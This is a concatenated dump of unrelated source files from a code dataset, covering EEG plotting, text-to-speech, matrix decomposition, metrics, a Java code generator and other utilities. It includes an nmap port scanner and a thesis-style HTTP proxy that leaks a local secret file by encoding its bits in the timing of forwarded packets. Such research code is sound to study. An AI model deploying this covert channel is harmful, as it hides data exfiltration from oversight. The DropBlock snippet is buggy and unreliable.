\"\"\"\n\n def __init__(self, m=4, num_lterms=10, headcolor=[0, 0, 0, 1]):\n self.interprange = np.pi * 3 / 4\n self.head_radius = self.interprange\n self.nose_angle = 15\n self.nose_length = 0.12\n\n self.headcolor = headcolor\n\n verts = np.array([\n (1, 0),\n (1, 0.5535714285714286), (0.5535714285714286, 1), (0, 1),\n (-0.5535714285714286, 1), (-1, 0.5535714285714286), (-1, 0),\n (-1, -0.5535714285714286), (-0.5535714285714286, -1), (0, -1),\n (0.5535714285714286, -1), (1, -0.5535714285714286), (1, 0),\n ]) * self.interprange\n codes = [path.Path.MOVETO,\n path.Path.CURVE4, path.Path.CURVE4, path.Path.CURVE4,\n path.Path.CURVE4, path.Path.CURVE4, path.Path.CURVE4,\n path.Path.CURVE4, path.Path.CURVE4, path.Path.CURVE4,\n path.Path.CURVE4, path.Path.CURVE4, path.Path.CURVE4,\n ]\n self.path_head = path.Path(verts, codes)\n\n x = self.head_radius * np.cos((90.0 - self.nose_angle / 2) * np.pi / 180.0)\n y = self.head_radius * np.sin((90.0 - self.nose_angle / 2) * np.pi / 180.0)\n verts = np.array([(x, y), (0, self.head_radius * (1 + self.nose_length)), (-x, y)])\n codes = [path.Path.MOVETO, path.Path.LINETO, path.Path.LINETO]\n self.path_nose = path.Path(verts, codes)\n\n self.legendre_factors = self.calc_legendre_factors(m, num_lterms)\n\n self.locations = None\n self.g = None\n self.z = None\n self.c = None\n self.image = None\n\n self.g_map = {}\n\n @staticmethod\n def calc_legendre_factors(m, num_lterms):\n return [(2 * n + 1) / (n ** m * (n + 1) ** m * 4 * np.pi) for n in range(1, num_lterms + 1)]\n\n def calc_g(self, x):\n return np.polynomial.legendre.legval(x, self.legendre_factors)\n\n def set_locations(self, locations):\n n = len(locations)\n\n g = np.zeros((1 + n, 1 + n))\n g[:, 0] = np.ones(1 + n)\n g[-1, :] = np.ones(1 + n)\n g[-1, 0] = 0\n for i in range(n):\n for j in range(n):\n g[i, j + 1] = self.calc_g(np.dot(locations[i], locations[j]))\n\n self.locations = locations\n self.g = g\n\n def set_values(self, z):\n self.z = z\n self.c = np.linalg.solve(self.g, np.concatenate((z, [0])))\n\n def get_map(self):\n return self.image\n\n def set_map(self, img):\n self.image = img\n\n def calc_gmap(self, pixels):\n\n try:\n return self.g_map[pixels]\n except KeyError:\n pass\n\n x = np.linspace(-self.interprange, self.interprange, pixels)\n y = np.linspace(self.interprange, -self.interprange, pixels)\n\n xy = np.transpose(np.meshgrid(x, y))\n\n e = array_project_radial_to3d(xy)\n\n gmap = self.calc_g(e.dot(np.transpose(self.locations)))\n self.g_map[pixels] = gmap\n return gmap\n\n def create_map(self, pixels=32):\n gm = self.calc_gmap(pixels)\n self.image = gm.dot(self.c[1:]) + self.c[0]\n\n def plot_map(self, axes=None, crange=None, offset=(0,0)):\n if axes is None: axes = plot.gca()\n if crange is None:\n vru = np.nanmax(np.abs(self.image))\n vrl = -vru\n else:\n vrl, vru = crange\n head = self.path_head.deepcopy()\n head.vertices += offset\n return axes.imshow(self.image, vmin=vrl, vmax=vru, clip_path=(head, axes.transData),\n extent=(offset[0]-self.interprange, offset[0]+self.interprange,\n offset[1]-self.interprange, offset[1]+self.interprange))\n\n def plot_locations(self, axes=None, offset=(0,0)):\n if axes is None: axes = plot.gca()\n for p in self.locations:\n p2 = project_radial_to2d(Vector.fromiterable(p))\n axes.plot(p2.x+offset[0], p2.y+offset[1], 'k.')\n\n def plot_head(self, axes=None, offset=(0,0)):\n if axes is None: axes = plot.gca()\n head = self.path_head.deepcopy()\n nose = self.path_nose.deepcopy()\n head.vertices += offset\n nose.vertices += offset\n 
axes.add_patch(patches.PathPatch(head, facecolor='none', edgecolor=self.headcolor, lw=2))\n axes.add_patch(patches.PathPatch(nose, facecolor='none', edgecolor=self.headcolor, lw=2))\n\n def plot_circles(self, radius, axes=None, offset=(0,0)):\n if axes is None: axes = plot.gca()\n col = interp1d([-1, 0, 1], [[0, 1, 1], [0, 1, 0], [1, 1, 0]])\n for i in range(len(self.locations)):\n p3 = self.locations[i]\n p2 = project_radial_to2d(Vector.fromiterable(p3))\n circ = plot.Circle((p2.x+offset[0], p2.y+offset[1]), radius=radius, color=col(self.z[i]))\n axes.add_patch(circ)\n\n\ndef topoplot(values, locations, headcolor=[0, 0, 0, 1], axes=None, offset=(0, 0)):\n topo = Topoplot(headcolor=headcolor)\n topo.set_locations(locations)\n topo.set_values(values)\n topo.create_map()\n #h = topo.plot_map(axes, offset)\n topo.plot_map(axes=axes, offset=offset)\n topo.plot_locations(axes=axes, offset=offset)\n topo.plot_head(axes=axes, offset=offset)\n #plot.colorbar(h)\n return topo\n","sub_path":"eegtopo/topoplot.py","file_name":"topoplot.py","file_ext":"py","file_size_in_byte":5794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"96112672","text":"\"\"\" Text to Speach \"\"\"\n\"\"\" Environment: talk_program \"\"\"\n\nimport io\nimport pygame\nfrom gtts import gTTS\n\ndef speak(text_to_speak):\n with io.BytesIO() as file:\n gTTS(text=text_to_speak, lang='en').write_to_fp(file)\n file.seek(0)\n pygame.mixer.init()\n pygame.mixer.music.load(file)\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n continue\n\nif __name__ == \"__main__\":\n text = str(input(\"What would like me to say?: \"))\n speak(text)\n \n","sub_path":"TextToSpeech.py","file_name":"TextToSpeech.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"213559765","text":"\r\nimport nmap\r\nimport ipaddress\r\nimport re\r\n\r\nport_range_pattern = re.compile(\"([0-9]+)-([0-9]+)\")\r\nport_min = 0\r\nport_max = 65535\r\n\r\n\r\nprint(r\"\"\" ____ ___ \r\n\\ \\ / / | (_)\\ | _ \\\r\n \\ \\ ____ / / | ___| || \\ \\\r\n \\ \\ / /\\ \\ / / | | || | | \r\n \\ \\ / / \\ \\ / / | | ||_/ /\r\n \\_\\_/_/ \\_\\_/_/ |_| |___/\"\"\")\r\nprint(\"\\n****************************************************************\")\r\nprint(\"\\n* Copyright of WPD, 2021 *\")\r\nprint(\"\\n****************************************************************\")\r\n\r\nwhile True:\r\n ip_add_entered = input(\"\\nPlease enter the ip address that you want to scan: \")\r\n try:\r\n ip_address_obj = ipaddress.ip_address(ip_add_entered)\r\n print(\"You entered a valid ip address.\")\r\n break\r\n except:\r\n print(\"You entered an invalid ip address\")\r\n\r\n\r\nwhile True:\r\n print(\"Please enter the range of ports you want to scan in format: - (ex would be 60-120)\")\r\n port_range = input(\"Enter port range: \")\r\n port_range_valid = port_range_pattern.search(port_range.replace(\" \",\"\"))\r\n if port_range_valid:\r\n port_min = int(port_range_valid.group(1))\r\n port_max = int(port_range_valid.group(2))\r\n break\r\n\r\nnm = nmap.PortScanner()\r\nfor port in range(port_min, port_max + 1):\r\n try:\r\n result = nm.scan(ip_add_entered, str(port))\r\n port_status = (result['scan'][ip_add_entered]['tcp'][port]['state'])\r\n print(f\"Port {port} is {port_status}\")\r\n except:\r\n print(f\"Cannot scan port 
{port}.\")\r\n","sub_path":"nmap_port_scanner_ip_obj.py","file_name":"nmap_port_scanner_ip_obj.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"347789295","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:赵鑫\n\n# python实现矩阵分解\n\nimport numpy as np\nfrom Decomposition.ModifiedGramSchmidt import ModifiedGramSchmidt\nfrom Decomposition.LU import LU\nfrom Decomposition.Householder import Householder\nfrom Decomposition.Givens import Givens\n\n\ndef main(np_array, type='GS'):\n \"\"\"Matrix decomposition on numpy square array.\n\n Args:\n np_array: a numpy array of shape n × n.\n type:\n 'LU': LU decomposition method;\n 'GS'(default): Modified Gram Schmidt orthogonalization method;\n 'HO': Householder reduction method;\n 'GI': Givens reduction method;\n\n Returns:\n a tuple contains two numpy square arrays\n of Matrix decomposition result\n \"\"\"\n\n if type == 'LU':\n return LU(np_array)\n if type == 'GS':\n return ModifiedGramSchmidt(np_array)\n if type == 'HO':\n return Householder(np_array)\n if type == 'GI':\n return Givens(np_array)\n\n return ModifiedGramSchmidt(np_array)\n\n\ndef test():\n '''Expect result:\n L = [[1., 0., 0.], U = [[1., 4., 5.],\n [4., 1., 0.], [0., 2., 6.],\n [3., 2., 1.]] [0., 0., 3.]]\n '''\n np_array = np.array([[1., 4., 5.],\n [4., 18., 26.],\n [3., 16., 30.]])\n\n print(\"LU Decomposition:\")\n for _ in main(np_array, 'LU'):\n print(_)\n print(\"*****************************************************\\n\")\n\n '''Expect result:\n Q = (1/15)[[ 5., 14., -2.], R = [[3., 15., 0.],\n [-10., 5., 10.], [0., 15., -30.],\n [ 10., -2., 11.]] [0., 0., 45.]]\n '''\n np_array = np.array([[1., 19., -34.],\n [-2., -5., 20.],\n [2., 8., 37.]])\n\n type_set = ('GS', 'HO', 'GI')\n for type in type_set:\n print(type, \"Decomposition:\")\n for _ in main(np_array, type):\n print(_)\n print(\"*****************************************************\\n\")\n\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"270734975","text":"import numpy as np\nimport pandas as pd\n\n__all__ = ['normal_loss', 'mean_absolute_error', 'mean_squared_error',\n 'mean_absolute_percentage_error', 'hinge', 'explained_variance_score',\n 'median_absolute_error', 'r2_score', 'regression_report']\n\ndef normal_loss(y_true, y_pred, k, log=False, root=False):\n \"\"\"Mean normal error regression loss.\n \n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted values, as returned by a regression.\n k: int, loss = np.sqrt(loss, 1/k).\n log: default False, whether to log the variable.\n root: default False, whether to sqrt the variable, if True, return rmse loss.\n Returns:\n regression loss values.\n \"\"\"\n if log:\n loss = (np.log1p(y_true)-np.log1p(y_pred)).abs().pow(k).mean()\n else:\n loss = (y_true-y_pred).abs().pow(k).mean()\n if root:\n loss = np.sqrt(loss, 1/k)\n return loss\n\ndef mean_absolute_error(y_true, y_pred, log=False):\n \"\"\"Mean absolute error regression loss.\n \n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted values, as returned by a regression.\n log: default False, whether to log the variable.\n Returns:\n regression loss values.\n \"\"\"\n return normal_loss(y_true, y_pred, k=1, log=log, root=False)\n\ndef 
mean_squared_error(y_true, y_pred, log=False, root=False):\n \"\"\"Mean squared error regression loss.\n \n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted values, as returned by a regression.\n log: default False, whether to log the variable.\n root: default False, whether to sqrt the variable, if True, return rmse loss.\n Returns:\n regression loss values.\n \"\"\"\n return normal_loss(y_true, y_pred, k=2, log=log, root=root)\n\ndef mean_absolute_percentage_error(y_true, y_pred):\n \"\"\"Mean absolute percentage error regression loss.\n \n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted values, as returned by a regression.\n Returns:\n regression loss values.\n \"\"\"\n return ((y_true-y_pred)/y_true).abs().mean()\n\ndef hinge(y_true, y_pred, k=1):\n \"\"\"hinge regression loss.\n \n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted values, as returned by a regression.\n k: int, pow() function dim.\n Returns:\n regression loss values.\n \"\"\"\n return (1-y_true*y_pred).clip(lower=0).pow(k).mean()\n\ndef explained_variance_score(y_true, y_pred):\n \"\"\"explained variance regression loss.\n \n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted values, as returned by a regression.\n Returns:\n regression loss values.\n \"\"\"\n return 1-(y_true-y_pred).std()**2/y_true.std()**2\n\ndef median_absolute_error(y_true, y_pred):\n \"\"\"Median absolute error regression loss.\n \n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted values, as returned by a regression.\n Returns:\n regression loss values.\n \"\"\"\n return (y_true-y_pred).abs().median()\n\ndef r2_score(y_true, y_pred):\n \"\"\"r2 regression loss.\n \n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted values, as returned by a regression.\n Returns:\n regression loss values.\n \"\"\"\n return 1-(y_true-y_pred).pow(2).sum()/(y_true-y_true.mean()).pow(2).sum()\n\ndef regression_report(y_true, y_pred, printable=False, printinfo='Regression Report'):\n \"\"\"\n Args:\n y_true: pd.Series, ground truth (correct) labels.\n y_pred: pd.Series, predicted labels.\n Returns:\n regression report.\n \"\"\"\n result = {'mean_absolute_error':mean_absolute_error(y_true, y_pred),\n 'mean_squared_error':mean_squared_error(y_true, y_pred),\n 'mean_absolute_percentage_error':mean_absolute_percentage_error(y_true, y_pred),\n 'hinge_loss':hinge(y_true, y_pred),\n 'explained_variance_score':explained_variance_score(y_true, y_pred),\n 'median_absolute_error':median_absolute_error(y_true, y_pred),\n 'r2_score':r2_score(y_true, y_pred)\n }\n if printable:\n print(\"\\n{}\".format(printinfo))\n print(\"mean_absolute_error: %.4f\" % result['mean_absolute_error'])\n print(\"mean_squared_error: %.4f\" % result['mean_squared_error'])\n print(\"mean_absolute_percentage_error: %.4f\" % result['mean_absolute_percentage_error'])\n print(\"hinge_loss: %.4f\" % result['hinge_loss'])\n print(\"explained_variance_score: %.4f\" % result['explained_variance_score'])\n print(\"median_absolute_error: %.4f\" % result['median_absolute_error'])\n print(\"r2_score: %.4f\" % result['r2_score'])\n return result\n","sub_path":"linora/metrics/_regression.py","file_name":"_regression.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"172713281","text":"# 
!/usr/bin/python3\n\nfrom urllib.parse import urlparse\nfrom bitstring import BitArray\nimport time\nimport select\nimport socket\nimport sys\n\nclass Proxy:\n def __init__(self):\n\n if len(sys.argv) != 2:\n print(\"Program needs exactly one argument: device_IP (or localhost)\")\n sys.exit(0)\n else:\n self.proxyIP = sys.argv[1]\n\n self.lsock = []\n self.msgToClient = []\n self.msgToServer = []\n self.lastSend = []\n self.pause = 1\n self.secretData = []\n self.longBreak = 0.08 # sec\n self.factor = 0.5 # difference between long and short break\n self.shortBreak = self.longBreak * self.factor\n self.fileCursor = []\n self.breakBetweenTransmit = 1\n self.fileStart = True\n\n # cuts the IP-address out of the http request (URL)\n def cutIpFromData(self, data):\n data = data.decode('Latin-1')\n pos = data.find(\"http:/\")\n if pos != -1:\n data = data[:pos] + data[(pos + len(\"http:/\")):]\n split = data.split(\"/\")\n pos = data.find(split[1])\n if pos != -1:\n data = data[:pos - 1] + data[(pos + len(split[1])):]\n\n data = data.encode('Latin-1')\n return data\n\n # gets the IP-Address from the request\n def getAddress(self, request):\n requestStr = str(request) # parse the first line\n first_line = requestStr.split(' ')\n print(first_line)\n if len(first_line) == 0: # get url\n print(requestStr)\n if len(first_line) > 2:\n self.url = first_line[1]\n print(self.url)\n urlObj = urlparse(self.url)\n else:\n return\n\n if urlObj.netloc == \"\":\n portStart = urlObj.path.find(\":\")\n if portStart == -1:\n self.webserverPort = 443 #default\n self.webserver = urlObj.path\n else:\n self.webserverPort = int(urlObj.path[(portStart + 1):])\n self.webserver = urlObj.path[0:portStart]\n\n else:\n portStart = urlObj.netloc.find(\":\")\n if portStart == -1:\n self.webserverPort = 80 #default\n self.webserver = urlObj.netloc\n else:\n self.webserverPort = int(urlObj.netloc[(portStart + 1):])\n self.webserver = urlObj.netloc[0:portStart]\n\n print(self.webserver + \" \" + str(self.webserverPort))\n\n #is called when a new client connects, also builds a server socket\n def newClient(self, s):\n (self.clientSocket, self.client_address) = s.accept() # Establish the connection\n print(\"client accepted\")\n\n request = self.clientSocket.recv(20000)\n\n self.webserverPort = -1\n self.webserver = \"\"\n\n if request != \"\":\n self.getAddress(request)\n\n if self.webserver != \"\" and self.webserverPort != -1:\n try:\n self.serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.serverSocket.connect((self.webserver, self.webserverPort))\n\n\n request = self.cutIpFromData(request)\n print(request)\n self.serverSocket.sendall(request)\n\n\n self.lsock.append(self.clientSocket)\n self.lsock.append(self.serverSocket)\n\n self.msgToServer.append([])\n self.msgToClient.append([])\n self.lastSend.append(time.time())\n self.fileCursor.append(0)\n\n print(\"server and client added\")\n\n except:\n e = sys.exc_info()[0]\n print(e)\n\n # searches a socket in the socket ist and returns its value\n def getSocketIndex(self, s):\n sockIndex = -1\n for sock in self.lsock:\n if sock == s:\n sockIndex += 1\n break;\n else:\n sockIndex += 1\n return sockIndex\n\n # checks if the readable socket is from client or the server\n def read(self, readable):\n for s in readable:\n sockIndex = self.getSocketIndex(s)\n if sockIndex == 0:\n self.newClient(s)\n else:\n if sockIndex % 2 == 0:\n self.readFromServer(s, sockIndex)\n else:\n self.readFromClient(s, sockIndex)\n\n # checks if the writable socket is from client or 
the server\n def send(self, writable):\n for t in writable:\n sockIndex = self.getSocketIndex(t)\n if sockIndex == 0:\n print(\"unlikely to happen\")\n else:\n if sockIndex % 2 == 0:\n self.sendToServer(t, sockIndex)\n else:\n self.sendToClient(t, sockIndex)\n\n def readFromServer(self, s, sockIndex):\n data = s.recv(48)\n if data != b'':\n self.msgToClient[(int(sockIndex / 2) - 1)].append(data)\n #print((\"\\nFROM SERFER\\n\" + str(self.msgToClient[int((sockIndex / 2) - 1)])))\n\n def readFromClient(self, s, sockIndex):\n data = s.recv(48)\n if data != b'':\n self.msgToServer[int((sockIndex - 1) / 2)].append(data)\n #print((\"\\nFROM CLIENT\\n\" + str(self.msgToServer[int((sockIndex - 1) / 2)])))\n\n\n def sendToClient(self, t, sockIndex):\n if len(self.msgToClient[int((sockIndex-1)/2)]) != 0:\n\n #calculates time diverence\n lastTime = self.lastSend[int((sockIndex - 1) / 2)]\n currenTime = time.time()\n div = currenTime - lastTime\n\n # checks if it is not the file start and sets the break\n if self.pause != self.breakBetweenTransmit:\n if self.secretData[self.fileCursor[int((sockIndex - 1) / 2)]] == '1':\n self.pause = self.longBreak\n else:\n if self.secretData[self.fileCursor[int((sockIndex - 1) / 2)]] == '0':\n self.pause = self.shortBreak\n else:\n self.pause = 0.01\n\n # checks if the break is over\n if div > self.pause:\n if self.pause == self.breakBetweenTransmit:\n self.pause = 0\n data = self.msgToClient[int((sockIndex - 1) / 2)].pop(0)\n try:\n t.sendall(data)\n self.lastSend[int((sockIndex - 1) / 2)] = time.time()\n except:\n print(sys.exc_info()[0])\n return\n\n self.pause = 0\n data = self.msgToClient[int((sockIndex - 1) / 2)].pop(0)\n print(\"\\nTO CLIENT\\n\" + str(data))\n try:\n t.sendall(data)\n self.lastSend[int((sockIndex - 1) / 2)] = time.time()\n # end of file\n if len(self.secretData) - 1 == self.fileCursor[int((sockIndex - 1) / 2)]:\n self.fileCursor[int((sockIndex - 1) / 2)] = 0\n self.pause = self.breakBetweenTransmit\n else:\n self.fileCursor[int((sockIndex - 1) / 2)] += 1\n except:\n print(sys.exc_info()[0])\n\n\n def sendToServer(self, t, sockIndex):\n if len(self.msgToServer[int((sockIndex / 2) - 1)]) != 0:\n data = self.msgToServer[int((sockIndex / 2) - 1)].pop(0);\n data = self.cutIpFromData(data)\n print(\"\\nTO SERVER\\n\" + str(data))\n try:\n t.sendall(data)\n except:\n print(sys.exc_info()[0])\n\n # generates 8 Bit Pearson Hash\n def hash8(self,data):\n #mapping tabel\n s = [129, 69, 229, 238, 16, 104, 178, 222, 95, 5, 171, 147, 231, 170, 105,\n 61, 85, 217, 236, 223, 87, 221, 60, 38, 125, 151, 124, 86, 137, 143,\n 230, 25, 228, 116, 62, 12, 150, 42, 177, 65, 207, 20, 122, 67, 109,\n 220, 208, 102, 183, 90, 28, 15, 245, 97, 145, 162, 156, 181, 155,\n 233, 111, 43, 157, 120, 247, 83, 194, 126, 34, 18, 198, 57, 121,\n 164, 74, 218, 8, 138, 130, 37, 51, 193, 4, 244, 152, 40, 45, 89,\n 35, 209, 21, 224, 76, 189, 96, 17, 201, 235, 64, 161, 68, 254,\n 202, 174, 44, 66, 133, 91, 72, 195, 210, 22, 52, 172, 56, 114,\n 63, 48, 197, 127, 88, 173, 0, 117, 10, 41, 106, 192, 188, 252,\n 169, 199, 242, 31, 214, 136, 7, 23, 103, 251, 6, 185, 11, 123,\n 98, 182, 46, 118, 110, 36, 225, 249, 160, 3, 163, 100, 80, 53,\n 1, 190, 141, 13, 255, 146, 93, 14, 140, 166, 211, 78, 184, 232,\n 108, 115, 19, 32, 167, 9, 113, 165, 253, 226, 132, 187, 154, 227,\n 205, 206, 58, 59, 134, 55, 128, 131, 204, 200, 24, 196, 144, 75, 216,\n 158, 49, 94, 107, 180, 168, 142, 119, 219, 153, 248, 212, 159, 239, 186,\n 179, 54, 27, 30, 84, 149, 203, 2, 191, 215, 175, 139, 81, 47, 92, 240, 
241,\n 148, 77, 26, 70, 71, 176, 99, 39, 234, 33, 50, 82, 213, 112, 237, 73, 135,\n 250, 101, 243, 246, 79, 29]\n result = []\n for byte in range(1):\n h = s[(int(data[0]) + byte) % 256]\n for c in data[1:]:\n h = s[h ^ int(c)]\n result.append(h)\n return result\n\n def getSecreteData(self):\n print(\"Secret Data:\")\n f = open(\"Secret/secret\", \"rb\")\n try:\n self.secretData = f.read()\n finally:\n f.close()\n self.secretData = BitArray(hex=self.secretData.hex()).bin\n hash = self.hash8(self.secretData)[0]\n hash = BitArray(hex=hex(hash)).bin\n self.secretData = list(self.secretData+hash)\n\n # adding 2 Byte of sync\n sync = [\"x\",\"x\",\"x\",\"x\",\"x\",\"x\",\"x\",\"x\",\"x\",\"x\",\"x\",\"x\"]\n self.secretData = sync+self.secretData\n print(self.secretData)\n\n #main function\n def proxy(self):\n\n # Create a TCP socket\n self.listenSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.listenSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Re-use the socket\n self.listenSocket.bind((self.proxyIP, 80)) # bind the socket to a public host, and a port\n self.listenSocket.listen(10) # become a server socket\n\n self.lsock.append(self.listenSocket)\n while True:\n readable, writable, exceptional = select.select(self.lsock, self.lsock, self.lsock)\n self.read(readable)\n self.send(writable)\n time.sleep(0.00002)\n\n\nproxy = Proxy()\nproxy.getSecreteData()\n\nproxy.proxy()\n\nwhile 1:\n pass\n","sub_path":"Bachelorarbeit_Maximilian_Nestle/Code/Proxy/Proxy.py","file_name":"Proxy.py","file_ext":"py","file_size_in_byte":10805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"257639892","text":"'''\nWrite a program which takes as input a set of integers represented by an array, and returns the size of a large subset\n`of integers in the array having the property that if two integers are in the subset, then so are all integers between them.\nFor example, if th einput is [3,-2,7,9,8,1,2,0,-1,5,8], the largest such subset is [-2,-1,0,1,2,3], so you should return 6.\n\nHint: Do you really need a totla ordering on the input?\n'''\n\n'''\nSolution:\n\nThe brute-force algorithm is to sort the array and then iterate through it, recording for each entry the largest subset\nwith the desired property ending at that entry.\n\nActually, don't need sortind and don't need the total ordering All we care about is whether the integers adjacent to a given\nvalue are present. Can use hash table to store the entries. \n\nIterate over the entires in the array, if an entry e is present in the hash table, we compute the largest interval including \ne such that all values in the interval are contained in the hash table. Iteratively searching entires in the hash table of the form\ne + 1, e + 2,...., and e - 1, e - 2,.... When we are done, to avoid doing duplicated computation, we remove all the entries\nin the computed interval from the hash table, since all these entries are in the same largest contained interval\n\n\nExample: \nConsider A = [10,5,3,11,6,100,4]. We initialize the hash table to {6,10,3,11,5,100,4}. The first entry in A is 10, and we find the \nlargest interval contained in A including 10 by expanding from 10 in each direction by doing lookups in the hash table. The largest \nset is {10,11} and is of size 2. This computation updates the hash table to {6,3,5,100,4}. The next entry in A is 5. Since it \nis contained in the hash table, we know that the largest interval contained in A including 5 has not been computed yet. 
Expanding from 5,\nwe see that 3,4,6 are all in the hash table, and 2 and 7 are not in the hash table, so the largest set containing 5 is {3,4,5,6}, which is of size\n4. We update the hash table to {100}. The three entries after 5, namelyu 3,11,6 are not present in the hash table, we know we have \nalready computed the longest intervals in A containing each of these. Then we get to 100, which cannot be extended, so the largest set \ncontaining it is {100}, which is of size 1. We update the hash table to {}. Since 4 is not in the hash table, we can skip it. \nThe largest of the three sets is {3,4,5,6} \n\nTime complexity: O(n), where n is the array length, since we add and remove array elements in the hash table no more than once.\n'''\n\ndef longest_contained_range(A):\n # unprocessed_entries records the existence of each entry in A.\n unprocessed_entries = set(A)\n\n max_interval_size = 0\n while unprocessed_entries:\n a = unprocessed_entries.pop()\n\n # Finds the lower bound of the largest range containing a.\n lower_bound = a - 1\n while lower_bound in unprocessed_entries:\n unprocessed_entries.remove(lower_bound)\n lower_bound -= 1\n\n # Finds the upper bound of th elargest range containing a.\n upper_bound = a + 1\n while upper_bound in unprocessed_entries:\n unprocessed_entries.remove(upper_bound)\n upper_bound += 1\n\n max_interval_size = max(max_interval_size, upper_bound - lower_bound - 1)\n\n\n return max_interval_size\n","sub_path":"epi/hash/length_of_longest_contained_interval.py","file_name":"length_of_longest_contained_interval.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"70097527","text":"import torch\n\nclass DropBlock(torch.nn.module):\n def __init__(self, block_size=7, keep_prob=0.9):\n self.block_size = block_size\n self.keep_prob = keep_prob\n self.gamma = None\n self.kernel_size = (block_size, block_size)\n self.stride = (1, 1)\n self.padding = (block_size//2, block_size//2)\n \n def calculate_gamma(self, x):\n return (1 - self.keep_prob) * x.shape[-1]**2/\\\n (self.block_size**2 * (x.shape[-1] - self.block_size + 1)**2) \n \n def forward(self, x):\n if not self.training:\n return x\n if self.gamma is None:\n self.gamma = self.calculate_gamma(x)\n p = torch.ones_like(x) * self.gamma\n mask = 1 - torch.nn.functional.max_pool2d(torch.bernoulli(p),\n self.kernel_size,\n self.stride,\n self.padding)\n return mask * x * (mask.numel()/mask.sum())\n","sub_path":"layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"356777483","text":"# coding=utf8\nimport collections\nimport shutil\nimport os\nimport codecs\nimport jinja2\n\n__author__ = 'yanwenyuan'\n\n\nclass Framework(object):\n @classmethod\n def copy(cls, src_path, des_path):\n if os.path.exists(des_path):\n shutil.rmtree(des_path)\n shutil.copytree(src_path, des_path, False)\n\n @classmethod\n def rm(cls, path):\n if os.path.exists(path):\n shutil.rmtree(path)\n\n @classmethod\n def render(cls, datas, template_file='xxxMapper.xml', template_path='java_templates',\n output_path='', output_file=''):\n\n \"\"\"\n :param datas: 页面所需数据\n :param template: 基础模板文件名\n :param template_path: 基础模板路径\n :return: 生成的文件路径(utf8编码)\n \"\"\"\n\n env = jinja2.Environment(loader=jinja2.PackageLoader(__name__, template_path))\n conf_template = env.get_template(template_file)\n\n out = 
conf_template.render(**datas)\n\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n with codecs.open(output_path + output_file, 'w', 'utf8') as f:\n f.write(out)\n\n @classmethod\n def web(cls, datas):\n web_base_path = datas['output_path'] + datas['artifactId'] + '/' + datas['artifactId'] + '-web/'\n web_res_path = web_base_path + '' + 'src/main/'\n web_java_path = web_base_path + '' + data['common_path'] + data['package_path'] + 'web/'\n\n print('web:' + web_java_path)\n print('BUILDING - web Controller')\n cls.render(datas=datas, template_file='xxxController.java',\n template_path='java_templates/web/java/controller',\n output_path=web_java_path + 'controller/',\n output_file=datas['table_name_uppercase'] + 'Controller.java')\n cls.render(datas=datas, template_file='BaseController.java',\n template_path='java_templates/web/java/controller',\n output_path=web_java_path + 'controller/',\n output_file='BaseController.java')\n print('OK - ' + datas['table_name_uppercase'] + 'Controller.java')\n\n print('BUILDING - web base classs')\n cls.render(datas=datas, template_file='CustomDateEditor.java',\n template_path='java_templates/web/java/common',\n output_path=web_java_path + 'common/',\n output_file='CustomDateEditor.java')\n\n cls.render(datas=datas, template_file='BeanUtils.java',\n template_path='java_templates/web/java/utils',\n output_path=web_java_path + 'utils/',\n output_file='BeanUtils.java')\n\n cls.render(datas=datas, template_file='WebUtils.java',\n template_path='java_templates/web/java/utils',\n output_path=web_java_path + 'utils/',\n output_file='WebUtils.java')\n\n # cls.copy('java_templates/web/java/common', web_java_path+'common')\n # cls.copy('java_templates/web/java/utils', web_java_path+'utils')\n print('OK - web base classs')\n\n print('BUILDING - web resources')\n cls.copy('java_templates/web/resources/conf', web_res_path + 'resources/conf')\n shutil.copy('java_templates/web/resources/log4j.xml', web_res_path + 'resources/log4j.xml')\n cls.render(datas=datas, template_file='spring-config-dao.xml',\n template_path='java_templates/web/resources',\n output_path=web_res_path + 'resources/',\n output_file='spring-config-dao.xml')\n cls.render(datas=datas, template_file='spring-config-servlet.xml',\n template_path='java_templates/web/resources',\n output_path=web_res_path + 'resources/',\n output_file='spring-config-servlet.xml')\n cls.render(datas=datas, template_file='spring-config-service.xml',\n template_path='java_templates/web/resources',\n output_path=web_res_path + 'resources/',\n output_file='spring-config-service.xml')\n cls.render(datas=datas, template_file='spring-config.xml',\n template_path='java_templates/web/resources',\n output_path=web_res_path + 'resources/',\n output_file='spring-config.xml')\n print('OK - web resources')\n\n print('BUILDING - web webapp')\n cls.copy('java_templates/web/webapp', web_res_path + 'webapp')\n # CURD\n cls.rm(web_res_path + 'webapp/WEB-INF/views/baseOperator')\n cls.render(datas=datas, 